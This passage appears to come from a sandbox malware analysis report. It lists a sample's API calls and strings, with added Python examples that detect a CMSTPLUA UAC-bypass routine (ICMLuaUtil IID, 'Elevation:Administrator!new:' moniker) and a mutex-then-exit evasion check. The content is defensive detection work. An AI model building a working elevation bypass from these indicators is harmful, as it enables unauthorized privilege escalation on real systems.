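The routine listed above assembles, by hand, the pieces of the CMSTPLUA COM elevation request that the report's signature section flags as "UAC Bypass using CMSTP": the ICMLuaUtil interface IID {6EDD6D74-C007-4E75-B76A-E5740995E24C}, the Elevation:Administrator!new: moniker for CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, the import names CoGetObject and IIDFromString that it resolves itself through GetProcAddress, and %s\explorer.exe path templates alongside them. The practical point for anyone writing a string rule from this listing is the encoding: the IID and the moniker are copied with lstrcpyW, so they sit in memory as UTF-16LE, while the API names are copied with lstrcpyA and are single-byte. A rule that matches the moniker as ASCII will never fire on this sample. The following added Python example (not code from the report or from the sample) scans a buffer with the correct encoding per indicator, treats the explorer.exe templates and IIDFromString as supporting evidence only, and shows the ASCII-only miss; the dump buffers it scans are constructed here as stand-ins for the 00400000 region the listing came from.

```python
"""Encoding-aware scan for the CMSTPLUA elevation indicators.

Added example, not code from the Joe Sandbox report or from the sample.
Every indicator string is taken from the report's listing for the routine
at 00401CBC-00401EEE; the encoding each one needs follows from the API
that writes it there (lstrcpyW -> UTF-16LE, lstrcpyA -> single-byte).
The buffers scanned at the bottom are constructed stand-ins for a dump.
"""
from typing import Dict, List, Set, Tuple

# Written with lstrcpyW in the listing, so they appear as UTF-16LE in memory.
WIDE = {
    "icmluautil_iid": "{6EDD6D74-C007-4E75-B76A-E5740995E24C}",
    "elevation_moniker": "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "explorer_template": "%s\\explorer.exe",
    "explorer_wow64_template": "%s\\SysWOW64\\explorer.exe",
}
# Written with lstrcpyA: the import names the routine resolves by hand.
NARROW = {
    "CoGetObject": "CoGetObject",
    "CoInitialize": "CoInitialize",
    "IIDFromString": "IIDFromString",
    "ExitProcess": "ExitProcess",
}
# Together these three identify the CMSTPLUA elevation request itself.
CORE = ("icmluautil_iid", "elevation_moniker", "CoGetObject")
# Seen in the same routine; reported as supporting evidence, not proof.
SUPPORT = ("explorer_template", "explorer_wow64_template", "IIDFromString")


def encode(name: str, text: str) -> bytes:
    """Encode an indicator the way the sample stores it."""
    return text.encode("utf-16-le") if name in WIDE else text.encode("ascii")


def scan(blob: bytes) -> Dict[str, int]:
    """Return {indicator: offset} for every indicator found in its correct encoding."""
    hits: Dict[str, int] = {}
    for name, text in {**WIDE, **NARROW}.items():
        off = blob.find(encode(name, text))
        if off != -1:
            hits[name] = off
    return hits


def classify(hits: Dict[str, int]) -> Tuple[str, List[str]]:
    """Verdict plus the supporting indicators that were also present."""
    if all(k in hits for k in CORE):
        return "cmstplua-elevation", [k for k in SUPPORT if k in hits]
    return "no-match", []


def ascii_only_scan(blob: bytes) -> Set[str]:
    """The mistake a naive rule makes: looking for the wide strings as ASCII."""
    return {n for n, t in WIDE.items() if blob.find(t.encode("ascii")) != -1}


def build_dump(wide_names, narrow_names) -> bytes:
    """Constructed buffer: a stub header followed by NUL-separated strings."""
    out = bytearray(b"MZ" + b"\x00" * 62)
    for n in wide_names:
        out += WIDE[n].encode("utf-16-le") + b"\x00\x00"
    for n in narrow_names:
        out += NARROW[n].encode("ascii") + b"\x00"
    return bytes(out)


SAMPLE_DUMP = build_dump(WIDE, NARROW)              # mimics the routine in the listing
BENIGN_COM_DUMP = build_dump([], ["CoInitialize"])  # an ordinary COM client

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_DUMP), ("benign", BENIGN_COM_DUMP)):
        verdict, support = classify(scan(blob))
        print(f"{label}: {verdict} support={support} ascii_only={ascii_only_scan(blob)}")
```

The same split carries straight into a YARA rule: declare the IID and the moniker with the `wide` modifier and the import names with `ascii`, or the rule silently misses the moniker exactly as `ascii_only_scan` does here.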
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FD07
                            • Part of subcall function 0040FCB0: DeleteFileW.KERNEL32(00000000), ref: 0040FD13
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FD79
                            • Part of subcall function 0040FCB0: __snwprintf.LIBCMT ref: 0040FDB3
                            • Part of subcall function 0040FCB0: DeleteFileW.KERNEL32(00000000), ref: 0040FDBF
                            • Part of subcall function 0040FCB0: RemoveDirectoryW.KERNEL32(00000000), ref: 0040FDC9
                            • Part of subcall function 0040FA70: __snwprintf.LIBCMT ref: 0040FB6F
                            • Part of subcall function 0040FA70: lstrlenW.KERNEL32(00000000), ref: 0040FB7E
                            • Part of subcall function 0040FA70: _memset.LIBCMT ref: 0040FBBA
                            • Part of subcall function 0040F950: __snwprintf.LIBCMT ref: 0040F9B1
                            • Part of subcall function 0040F950: lstrlenW.KERNEL32(00000000), ref: 0040F9BD
                            • Part of subcall function 0040F950: _memset.LIBCMT ref: 0040F9E7
                            • Part of subcall function 0040CB60: lstrlenW.KERNEL32(?), ref: 0040CBC0
                          • _memset.LIBCMT ref: 0041384A
                          • _memset.LIBCMT ref: 00413929
                          • __snwprintf.LIBCMT ref: 0041394E
                          • _memset.LIBCMT ref: 0041396D
                          • _memset.LIBCMT ref: 004139A6
                          • __snwprintf.LIBCMT ref: 004139D1
                          • __snwprintf.LIBCMT ref: 004139F5
                          • _memset.LIBCMT ref: 00413A12
                          • _memset.LIBCMT ref: 00413B1E
                          • lstrcpyW.KERNEL32(?,?), ref: 00413B68
                          • lstrcpyA.KERNEL32(?,?), ref: 00413B7C
                          • lstrcpyA.KERNEL32(?,?), ref: 00413B90
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BA4
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BB8
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BCC
                          • lstrcpyA.KERNEL32(?,?), ref: 00413BDD
                          • lstrcpyW.KERNEL32(?,?), ref: 00413BF1
                          • lstrcpyW.KERNEL32(?,?), ref: 00413C05
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$__snwprintf_memset$lstrlen$DeleteFile$DirectoryRemove
                          • String ID: %s%s$D$SOFTWARE\%s$Software\%s$Software\%s$Software\%s
                          • API String ID: 3783373364-3139701001
                          • Opcode ID: 05fb12e27edcc6c2d6afc6ad5ca974c20c164695b6e9347c4c6c97bdc79d9b09
                          • Instruction ID: 554e4eb59d561f71bdd4bdf1aedcfae321491c4bd9710b2450149f4ca0220a30
                          • Opcode Fuzzy Hash: 05fb12e27edcc6c2d6afc6ad5ca974c20c164695b6e9347c4c6c97bdc79d9b09
                          • Instruction Fuzzy Hash: 4B226FB1E00228ABDB24DF50DC49FD9B778BB49704F0085EAE60DA6281DB795BC8CF55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__snwprintf$_memmove$__flsbuf$lstrlen
                          • String ID: %s\%S.DLL$%s\cmd.exe$<$@$DLLCFG$open
                          • API String ID: 2279397060-2831413099
                          • Opcode ID: ef5c106684b76df30df0f945d1d101c7aa619b7a2f0416118fc1fccf789544c9
                          • Instruction ID: 9cb022f46225b0203a2f048387365820bfab8b78884083a4f67b60c848bcf3f8
                          • Opcode Fuzzy Hash: ef5c106684b76df30df0f945d1d101c7aa619b7a2f0416118fc1fccf789544c9
                          • Instruction Fuzzy Hash: 47127F71D00228ABDB24DF64DC45BDAB7B4EF49304F4045EAE60DA6281DBB86EC4CF59
                          APIs
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041C6B4
                          • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0041C6D8
                          • LocalFree.KERNEL32(00000000), ref: 0041C988
                          • CloseHandle.KERNEL32(?), ref: 0041C99D
                          • CloseHandle.KERNEL32(?), ref: 0041C9BD
                          • CloseHandle.KERNEL32(?), ref: 0041C9DD
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 0041C721
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Create$EventFreeLocalMutex
                          • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                          • API String ID: 4059844998-3593534564
                          • Opcode ID: fabdf2de27c9ed5b3d3675b6cb3fc5b280882c19a611ed24f1dbdfca60594713
                          • Instruction ID: 8e2eb44450e80806de686dfde9ead24df060b4f6c6e6b17cac50333030547494
                          • Opcode Fuzzy Hash: fabdf2de27c9ed5b3d3675b6cb3fc5b280882c19a611ed24f1dbdfca60594713
                          • Instruction Fuzzy Hash: AE919E71A94304DFD768CFA4DD88FEA77B5AB85301F20407AE21A962E0C77859C8CF59
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00427259), ref: 004293DF
                          • __mtterm.LIBCMT ref: 004293EB
                            • Part of subcall function 00429124: DecodePointer.KERNEL32(?,0042954D,?,00427259), ref: 00429135
                            • Part of subcall function 00429124: TlsFree.KERNEL32(?,0042954D,?,00427259), ref: 0042914F
                            • Part of subcall function 00429124: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,0042954D,?,00427259), ref: 0042D6E2
                            • Part of subcall function 00429124: _free.LIBCMT ref: 0042D6E5
                            • Part of subcall function 00429124: DeleteCriticalSection.KERNEL32(?,76EE5810,?,0042954D,?,00427259), ref: 0042D70C
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00429401
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042940E
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042941B
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00429428
                          • TlsAlloc.KERNEL32(?,00427259), ref: 00429478
                          • TlsSetValue.KERNEL32(00000000,?,00427259), ref: 00429493
                          • __init_pointers.LIBCMT ref: 0042949D
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294AE
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294BB
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294C8
                          • EncodePointer.KERNEL32(?,00427259), ref: 004294D5
                          • DecodePointer.KERNEL32(004292A8,?,00427259), ref: 004294F6
                          • __calloc_crt.LIBCMT ref: 0042950B
                          • DecodePointer.KERNEL32(00000000,?,00427259), ref: 00429525
                          • GetCurrentThreadId.KERNEL32 ref: 00429537
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 3698121176-3819984048
                          • Opcode ID: 1ca45e562565d4625d10964ac37ef6975b94661d637a3fff8b7ada5e85743eee
                          • Instruction ID: 27d2c4b6ff5e896d7de6a847955b3a202fa4fd1f8d9c6c08bd0691e81280500b
                          • Opcode Fuzzy Hash: 1ca45e562565d4625d10964ac37ef6975b94661d637a3fff8b7ada5e85743eee
                          • Instruction Fuzzy Hash: A7318031A106209BCBA26F79BC4D65E3EA1AB45730F50193FE408D32B0DB7A9885CF5C
                          APIs
                            • Part of subcall function 00422F70: lstrcpyA.KERNEL32(0047FF48,0047C710), ref: 00422FC4
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042224D
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422270
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422288
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00422351
                          • LocalAlloc.KERNEL32(00000040,00000004), ref: 00422368
                          • CreateThread.KERNEL32(00000000,00000000,00422650,00000000,00000000,00000000), ref: 00422394
                          • GetTickCount.KERNEL32 ref: 004223B1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223D9
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223F3
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042240E
                          • SetEvent.KERNEL32(00000000), ref: 004224C2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004224CE
                          • CloseHandle.KERNEL32(00000000), ref: 004224E9
                          • LocalFree.KERNEL32(00000000), ref: 00422500
                          • CloseHandle.KERNEL32(00000000), ref: 0042250A
                          • CloseHandle.KERNEL32(?), ref: 00422539
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422596
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004225A7
                          • SetEvent.KERNEL32(00000000), ref: 004225B8
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004225C4
                          • CloseHandle.KERNEL32(00000000), ref: 004225D4
                          • CloseHandle.KERNEL32(00000000), ref: 004225EB
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocal$AllocCountFreeMutexReleaseThreadTicklstrcpy
                          • String ID:
                          • API String ID: 335535459-0
                          • Opcode ID: 728a46b10e1e2828013278dd28072e5c69e21a7936df1565eb22f3c40a2ad63d
                          • Instruction ID: faa1747313b486ccb3f578eecdb1efd3cb5c6adc5866f93d4004153facd3ec1a
                          • Opcode Fuzzy Hash: 728a46b10e1e2828013278dd28072e5c69e21a7936df1565eb22f3c40a2ad63d
                          • Instruction Fuzzy Hash: DE715071B04214FBD714DFA4EE8DBEE7775AB48301F508425F605A62E0C7B89988CF69
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcscat$__snwprintf$_wcsrchr
                          • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                          • API String ID: 512907449-4258658051
                          • Opcode ID: e4d358261fa82804b23b57eafcd4642956b28081c5567a7a4f6f91946d3d581f
                          • Instruction ID: e6bc7966429afb5a548ca13169817c41486c1a403d71daee44646cc54eb2adf1
                          • Opcode Fuzzy Hash: e4d358261fa82804b23b57eafcd4642956b28081c5567a7a4f6f91946d3d581f
                          • Instruction Fuzzy Hash: 33B19171A4011DEBDB24DF90DC89FE9B379EBA4704F1081A9E1099B290D7789EC5CF58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                          • API String ID: 2455478650-2887319354
                          • Opcode ID: 9fec37e90be1e5d711fe9ccb1d09c48fbe43895e1659c25594be146fa64a0b8d
                          • Instruction ID: c753a69d3ae3a34ff5e4dfe94b40a541838cb6eac363416705fce405ddd013d8
                          • Opcode Fuzzy Hash: 9fec37e90be1e5d711fe9ccb1d09c48fbe43895e1659c25594be146fa64a0b8d
                          • Instruction Fuzzy Hash: 46A1B9B1A00318ABDB20DF60DC45FDA7375AFD8704F0045A9F609A61C1EBB49AC4CF99
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: */*$<$GET
                          • API String ID: 0-4180448669
                          • Opcode ID: 387d3dfbc3b61c523a69bc3412403f4b330e72a210b5eceb4ec097b738280215
                          • Instruction ID: 7a99ec0447dbee7cda976f748ed39e4c3387e5de0808e2fe2ca4f614e4815334
                          • Opcode Fuzzy Hash: 387d3dfbc3b61c523a69bc3412403f4b330e72a210b5eceb4ec097b738280215
                          • Instruction Fuzzy Hash: 63021AB0901318DFDB14CFA4DD99BEEB7B4BB48304F104199E659AB280D778AAC4CF59
                          APIs
                          • lstrcpyW.KERNEL32(?,0047C338), ref: 00405149
                          • lstrcpyW.KERNEL32(?,00479842), ref: 00405161
                          • lstrcpyW.KERNEL32(?,0047C3D4), ref: 00405179
                          • lstrcpyW.KERNEL32(?,00475E78), ref: 0040518F
                          • lstrcpyW.KERNEL32(?,00475DB0), ref: 004051A7
                          • lstrcpyW.KERNEL32(?,00475B58), ref: 004051BF
                          • lstrcpyW.KERNEL32(?,0047C29C), ref: 004051D5
                          • _memset.LIBCMT ref: 004052D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset
                          • String ID: %s %s$HWID_%s
                          • API String ID: 173388403-149837424
                          • Opcode ID: 5d8877784fb2612adda9e3ece72a4bc02278172bfb60a6d555ad60f0d597c1dc
                          • Instruction ID: fcda67d3f53b81f4923cad0cc3be4f9e0ccbba969170b24f050bdd49e9c28d54
                          • Opcode Fuzzy Hash: 5d8877784fb2612adda9e3ece72a4bc02278172bfb60a6d555ad60f0d597c1dc
                          • Instruction Fuzzy Hash: 12E1A170A10204AFD718DF60EC49FEB7779EB48304F40857AE50DA6292E7B999C8CF59
                          APIs
                          • OpenMutexW.KERNEL32(00100000,00000000,0047B13E), ref: 0041CB92
                          • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041CBA2
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041CBB9
                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0041CBDD
                          • CloseHandle.KERNEL32(?), ref: 0041CF7E
                          • CloseHandle.KERNEL32(00000000), ref: 0041CF8E
                          • CloseHandle.KERNEL32(?), ref: 0041CFB4
                          • LocalFree.KERNEL32(00000000), ref: 0041CFC4
                          • ExitProcess.KERNEL32 ref: 0041CFD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Local$AllocExitFileFreeLibraryLoadModuleMutexNameOpenProcess
                          • String ID: KERNEL32.DLL
                          • API String ID: 1134908570-2576044830
                          • Opcode ID: 0da63d721fd1b8c6d508c4ec5c50e407317695fc09efdd9f34cfbae4d9aa62e2
                          • Instruction ID: 63940c65c2a952fe54cb436896a4f62cda96884ae11185d129b6539cdb42b133
                          • Opcode Fuzzy Hash: 0da63d721fd1b8c6d508c4ec5c50e407317695fc09efdd9f34cfbae4d9aa62e2
                          • Instruction Fuzzy Hash: 0BB18070A84304DBDB14AFA0ED89BEE77B5AB14705F20403AF619B62D0D7B858C5CB5E
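The listing above is the evasive chain the report's signature section describes as "may stop execution after checking mutex": OpenMutexW with access mask 00100000 (SYNCHRONIZE) on the name at 0047B13E, and ExitProcess as the last call of the routine. Reading chains like this off the report by eye does not scale across several hundred entries, so here is an added Python example (not part of the report) that parses the bullet format used on this page into per-function call records and checks for ordered API sequences. It skips the "Part of subcall function" lines so that a callee's APIs are not attributed to the caller, and it pulls the literals passed to lstrcpyA/lstrcpyW so the narrow/wide split is visible at a glance. The two sample entries are copied from this report's listings for 0041CB92 and 00401CBC; the record fields and the chain checks are this example's own.

```python
"""Parse Joe Sandbox 'APIs' listings into per-function call sequences.

Added example, not part of the report.  The parser targets the bullet
format used on this page: '• Api.MODULE(args), ref: ADDR', optionally
prefixed by 'Part of subcall function ADDR:'.  The sample entries below
are copied from the report's listings for 0041CB92 and 00401CBC.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
SYNCHRONIZE = 0x00100000  # the only right OpenMutexW asks for in the listing


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall: Optional[str] = None  # set when the line is 'Part of subcall function'


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn one 'APIs' block into records; headings and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def has_ordered_sequence(calls: List[ApiCall], wanted: List[str]) -> bool:
    """True if the routine's own calls (subcalls excluded) contain `wanted` in address order."""
    own = iter(sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref))
    return all(any(c.api == w for c in own) for w in wanted)


def mutex_gate(calls: List[ApiCall]) -> Optional[dict]:
    """Flag an OpenMutexW that can be followed by ExitProcess in the same routine."""
    opens = [c for c in calls if c.api == "OpenMutexW" and c.subcall is None]
    if not opens or not has_ordered_sequence(calls, ["OpenMutexW", "ExitProcess"]):
        return None
    access = int(opens[0].args[0], 16)
    return {"ref": f"{opens[0].ref:08X}", "access": access,
            "synchronize_only": access == SYNCHRONIZE, "name_ptr": opens[0].args[2]}


def copied_literals(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Second argument of every lstrcpyA/lstrcpyW call, keyed by A (narrow) or W (wide)."""
    out: Dict[str, List[str]] = {"A": [], "W": []}
    for c in calls:
        if c.api in ("lstrcpyA", "lstrcpyW") and c.subcall is None and len(c.args) > 1:
            out[c.api[-1]].append(c.args[1])
    return out


MUTEX_CHECK_ENTRY = """\
APIs
• OpenMutexW.KERNEL32(00100000,00000000,0047B13E), ref: 0041CB92
• LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041CBA2
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041CBB9
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0041CBDD
• CloseHandle.KERNEL32(?), ref: 0041CF7E
• CloseHandle.KERNEL32(00000000), ref: 0041CF8E
• CloseHandle.KERNEL32(?), ref: 0041CFB4
• LocalFree.KERNEL32(00000000), ref: 0041CFC4
• ExitProcess.KERNEL32 ref: 0041CFD5
Strings
"""

UAC_ENTRY = """\
• _memset.LIBCMT ref: 00401CBC
  • Part of subcall function 0041D2C0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0040108A), ref: 0041D2CB
  • Part of subcall function 0041D2C0: GetProcAddress.KERNEL32(0040108A,IsWow64Process), ref: 0041D2E4
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00401DB1
• lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00401E7A
• lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00401EEE
"""

if __name__ == "__main__":
    print(mutex_gate(parse_api_lines(MUTEX_CHECK_ENTRY)))
    print(copied_literals(parse_api_lines(UAC_ENTRY)))
```

The subcall filter matters more than it looks: the report lists GetProcAddress under the 00401CBC routine only because a callee at 0041D2C0 uses it, so a naive grep for "GetProcAddress" in that block would attribute a call to the wrong function and skew any sequence rule built from it.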
                          APIs
                          • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,0041CD61), ref: 004089CD
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 004089E7
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00408A01
                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00408A1F
                          • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408A32
                          • __snwprintf.LIBCMT ref: 00408A4E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00408A5E
                          • LocalFree.KERNEL32(00000000), ref: 00408A6C
                          • LocalFree.KERNEL32(00000000), ref: 00408A76
                          • LocalFree.KERNEL32(00000000), ref: 00408A80
                          • LocalFree.KERNEL32(00000000), ref: 00408A91
                          • LocalFree.KERNEL32(00000000), ref: 00408A9B
                          • LocalFree.KERNEL32(00000000), ref: 00408AA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                          • String ID: %s\cmd.exe
                          • API String ID: 4247545968-923833829
                          • Opcode ID: d6eb2a02f91aa35655597c519299a3ce8976dd758b8ff4c3930e6d3aac2b402a
                          • Instruction ID: 3f565d551990a7556bdd0c062e45508b88c72433986c6d439a255130911ae3d3
                          • Opcode Fuzzy Hash: d6eb2a02f91aa35655597c519299a3ce8976dd758b8ff4c3930e6d3aac2b402a
                          • Instruction Fuzzy Hash: C8212875B04309FBDB149FA4DD49BAE77B5AB88701F1044B9F705A66D0CA78A940CF18
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004226C6
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042270E
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422748
                          • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 0042299E
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422CA7
                          • CloseHandle.KERNEL32(00000000), ref: 00422E22
                          • LocalFree.KERNEL32(?), ref: 00422E6E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingle$CloseFreeHandleLocalMultipleObjects
                          • String ID:
                          • API String ID: 960796149-0
                          • Opcode ID: 926079ce3b34f8aa2bebee9943d390324f444ca90cabbcbdb484abdf5ec99831
                          • Instruction ID: e61ef60d893c71df151f921427a0a639f3976ef8da9708c7d2e896f1f2b42219
                          • Opcode Fuzzy Hash: 926079ce3b34f8aa2bebee9943d390324f444ca90cabbcbdb484abdf5ec99831
                          • Instruction Fuzzy Hash: 31223274B00218EFDB24DF94ED48BEA7775BB89304F5044A9EA49A7280C7B85EC4CF55
                          APIs
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 00416AB9
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00416AED
                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00416B06
                          • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 00416B44
                          • CloseHandle.KERNEL32(000000FF), ref: 00416B5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleReadSizelstrcpy
                          • String ID: .DLL$P{A
                          • API String ID: 3530118091-1392461530
                          • Opcode ID: 7472eaf7f6e632be50e5b3be10fa481bc85ba020c02400b5772d393eb835cb27
                          • Instruction ID: 8f496f5161c6566fac696d600ad60fdf2f328ff75d08b78d54c198b0cf88cc25
                          • Opcode Fuzzy Hash: 7472eaf7f6e632be50e5b3be10fa481bc85ba020c02400b5772d393eb835cb27
                          • Instruction Fuzzy Hash: 7AC15E75E00208DBDB18DFE4D889BEEBB75FF48305F108529E615AB290D738A985CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
